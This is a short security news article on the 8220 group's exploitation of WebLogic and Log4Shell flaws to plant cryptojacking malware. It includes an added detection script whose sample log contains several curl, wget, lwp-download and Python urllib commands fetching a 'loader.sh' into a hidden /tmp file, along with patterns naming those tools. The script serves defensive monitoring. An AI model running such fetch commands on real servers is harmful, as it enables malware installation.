Hacker Squad Targets Windows & Linux Web Servers Unmercilessly

December 18, 2023
1 min read

Key Points:

  • The 8220 hacker group, first identified by Cisco Talos in 2017, is compromising Windows and Linux web servers to deploy crypto-jacking malware.
  • Recently, the group targeted the Oracle WebLogic vulnerability CVE-2017-3506 and Log4Shell (CVE-2021-44228), continuing its history of exploiting vulnerabilities in applications such as Confluence, Log4j, Drupal, Hadoop YARN, and Apache Struts2.
  • The group was also found to be taking advantage of a remote code execution vulnerability in Oracle WebLogic Server, CVE-2020-14883, and an authentication bypass vulnerability, CVE-2020-14882. Details of both have been made public and are relatively easy to adapt for malicious purposes.

The 8220 hacker group uses two separate exploit chains. One leverages an XML file to execute further commands on the operating system; the other executes Java code without any XML file. The XML-based chain fetches a different XML file depending on the target operating system. On Linux specifically, the group downloads additional files using cURL, wget, lwp-download, and Python's urllib.
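
As an added defender-side example (not code from the original post or from Imperva's report), the check below scans constructed process-creation log lines and flags the Linux download utilities named above when they are launched directly by the Java web-server process. The log format, the parent-process names and the sample addresses are assumptions made for the example.

```python
import re
from typing import Dict, List, Optional

# The Linux download tools the report names; python is flagged only when
# its command line shows urllib use or an inline (-c) script.
DOWNLOADERS = {
    "curl": re.compile(r"^curl\b"),
    "wget": re.compile(r"^wget\b"),
    "lwp-download": re.compile(r"^lwp-download\b"),
    "python-urllib": re.compile(r"^python[0-9.]*\b.*(?:urllib|-c\s)"),
}
# Parent process names treated as the WebLogic/Java web-server tier
# (assumption: the application server runs as a plain 'java' process).
SERVER_PARENTS = {"java", "startWebLogic.sh"}
URL_RE = re.compile(r"(?:https?|ftp)://[^\s'\",)]+")
# Assumed log format: <timestamp> parent=<process name> cmd=<command line>
LINE_RE = re.compile(r"^(?P<ts>\S+) parent=(?P<parent>\S+) cmd=(?P<cmd>.*)$")

def classify_downloader(cmd: str) -> Optional[str]:
    """Return the downloader name if cmd invokes one of the watched tools."""
    for name, pattern in DOWNLOADERS.items():
        if pattern.search(cmd):
            return name
    return None

def find_server_spawned_downloads(lines: List[str]) -> List[Dict[str, Optional[str]]]:
    """Flag download utilities spawned by the web-server process itself.

    An application server rarely needs to shell out to curl or wget, so the
    parent/child pairing is the signal, not the URL.
    """
    hits = []
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m or m["parent"] not in SERVER_PARENTS:
            continue
        tool = classify_downloader(m["cmd"])
        if tool is None:
            continue
        url = URL_RE.search(m["cmd"])
        hits.append({"ts": m["ts"], "tool": tool, "url": url.group(0) if url else None})
    return hits

# Constructed sample events (not from a real incident; 198.51.100.0/24 is a
# documentation range). Only the four java-spawned downloads should be flagged.
SAMPLE_LOG = """
2023-12-18T10:01:02Z parent=java cmd=curl -fsSL http://198.51.100.7/loader.sh -o /tmp/.x
2023-12-18T10:01:03Z parent=java cmd=wget -q http://198.51.100.7/loader.sh -O /tmp/.x
2023-12-18T10:01:04Z parent=java cmd=lwp-download http://198.51.100.7/loader.sh /tmp/.x
2023-12-18T10:01:05Z parent=java cmd=python -c import urllib.request;urllib.request.urlretrieve('http://198.51.100.7/loader.sh','/tmp/.x')
2023-12-18T10:05:00Z parent=bash cmd=curl -fsSL https://repo.example.net/index.html
2023-12-18T10:06:00Z parent=java cmd=ls -la /tmp
""".strip().splitlines()
```

Running `find_server_spawned_downloads(SAMPLE_LOG)` returns the four java-spawned events; the interactive-shell curl and the harmless `ls` are ignored.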

Following the download and execution stage, compromised hosts are infected with the AgentTesla, rhajk, and nasqa malware variants. Imperva has published a detailed report covering the exploitation methods, the commands used, encoding details, and more.

The increasing sophistication and reach of groups like 8220 underscore the need for robust security measures, especially for Windows and Linux web servers, which appear to be prime targets.
